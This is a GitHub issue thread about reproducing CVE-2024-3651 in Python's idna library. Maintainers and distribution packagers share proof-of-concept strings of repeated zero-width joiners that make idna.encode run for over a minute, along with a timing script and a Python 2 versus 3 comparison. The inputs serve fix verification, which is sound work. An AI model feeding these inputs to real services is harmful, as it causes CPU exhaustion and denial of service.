Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reproducer for CVE-2024-3651 #175

Closed
frenzymadness opened this issue Apr 17, 2024 · 7 comments
Closed

Reproducer for CVE-2024-3651 #175

frenzymadness opened this issue Apr 17, 2024 · 7 comments

Comments

@frenzymadness
Copy link

Hello.

I'm trying to verify the fix for CVE-2024-3651 and I'm not able to come up with an input for idna.encode that would cause significant resource consumption or that would take significantly longer to compute on version 3.6 vs 3.7.

When I try something like (derived from tests):

zwnj = '\u200c'
latin = '\u0061'

idna.encode(latin * 1000 + zwnj)

I see in the output of Python cProfiler that some functions are called many times but it doesn't create a significant difference in the execution time.

In 3.6:

$ python3 -m cProfile -s ncalls poc.py | head

         14231 function calls (14181 primitive calls) in 0.005 seconds

   Ordered by: call count

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     5007    0.000    0.000    0.000    0.000 {built-in method builtins.ord}
     2003    0.000    0.000    0.000    0.000 intranges.py:35(_decode_range)
1096/1095    0.000    0.000    0.000    0.000 {built-in method builtins.len}
     1024    0.000    0.000    0.000    0.000 {method 'get' of 'dict' objects}
     1002    0.001    0.000    0.001    0.000 intranges.py:39(intranges_contain)

In 3.7:

$ python3 -m cProfile -s ncalls poc.py | head

         9337 function calls (9284 primitive calls) in 0.018 seconds

   Ordered by: call count

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     2003    0.000    0.000    0.000    0.000 intranges.py:35(_decode_range)
1096/1095    0.000    0.000    0.000    0.000 {built-in method builtins.len}
     1011    0.000    0.000    0.000    0.000 {built-in method builtins.ord}
     1002    0.001    0.000    0.001    0.000 intranges.py:39(intranges_contain)
     1002    0.000    0.000    0.000    0.000 intranges.py:32(_encode_range)
@guidovranken
Copy link

import idna
s = "2\u07cd" + ("\u200c"*16384) + "\u07ccidna.encode(s)

@kjd kjd closed this as completed Apr 17, 2024
@antoniotorresm
Copy link

Hi, @kjd

We've tried reproducing this CVE on an older version of idna (2.4), which is the current version of RHEL7, we are using the following script:

import idna
import time

s = "2\u07cd" + "\u200c" * 4004 + "\u07cc"

print("If vulnerable, it'll take seconds to finish")

start = time.time()

try:
    idna.encode(s)
except Exception as e:
    print(type(e)," raised")

end = time.time()
total = end - start
print("It took", total, " seconds")

if total > 1:
    print("VULNERABLE")
else:
    print("FIXED") 

However it's failing with a different exception:

# python poc.py  
If vulnerable, it'll take seconds to finish
(<class 'idna.core.IDNAError'>, ' raised')
('It took', 0.0005650520324707031, ' seconds')
FIXED

The CVE page states that this issue affects all version of idna. Maybe there's a better input that would help reproducing this issue in RHEL7? Or it's just an unrelated error and this version is actually not vulnerable?

@frenzymadness
Copy link
Author

That information would help to update this page: GHSA-jjg7-2v4v-x38h and other CVE databases.

@guidovranken
Copy link

Seems pretty slow to me:

jhg@hank:~/idna-2.4-repro$ python3 -m venv venv
jhg@hank:~/idna-2.4-repro$ source venv/bin/activate
(venv) jhg@hank:~/idna-2.4-repro$ pip install idna==2.4
Collecting idna==2.4
  Downloading idna-2.4-py2.py3-none-any.whl (55 kB)
     |████████████████████████████████| 55 kB 5.3 MB/s 
Installing collected packages: idna
Successfully installed idna-2.4
(venv) jhg@hank:~/idna-2.4-repro$ cat repro.py 
import idna
s = "2\u07cd" + ("\u200c"*16384) + "\u07cc"
idna.encode(s)
(venv) jhg@hank:~/idna-2.4-repro$ time python3 repro.py 
Traceback (most recent call last):
  File "repro.py", line 3, in <module>
    idna.encode(s)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 355, in encode
    result.append(alabel(label))
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 276, in alabel
    check_label(label)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 255, in check_label
    check_bidi(label)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 85, in check_bidi
    raise IDNABidiError('First codepoint in label {0} must be directionality L, R or AL'.format(repr(label)))
(...lots of garbage)
real	1m15.866s
user	1m15.865s
sys	0m0.000s
$ python3 --version
Python 3.8.10

I tried your script too, takes about 4s and it says VULNERABLE.

@frenzymadness
Copy link
Author

Hmm, I might see the difference. The python-idna is in Centos 7 available for Python 2.7.

$ python -V
Python 2.7.18

$ time python poc.py
If vulnerable, it'll take seconds to finish
(<class 'idna.core.IDNAError'>, 'raised')
('It took', 0.0011670589447021484, 'seconds')
FIXED
python poc.py  0.02s user 0.01s system 96% cpu 0.031 total

@guidovranken
Copy link

It might be worth looking into why that is. If idna is supposed to exhibit identical behavior between Python 2 and 3 (not sure if it is, I have limited familiarity with this project) then this could indicate some kind of logic bug, because while Python 2 could be faster in some respects than Python 3, the difference in execution times is so pronounced that it might indicate that with Python 2, the control flow is bypassing some essential logic in idna. Alternatively, it could indicate a serious performance regression on the part of Python 3.

@frenzymadness
Copy link
Author

I've investigated that and the idna 2.4 is vulnerable as well under both Python 2 and Python 3. The difference we saw previously was caused by the bytes/unicode difference in the reproducer - in Python 2 the testing object contains bytes and that causes the encoding process to crash at a different spot. But when unicode string is used, the behavior is identical.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants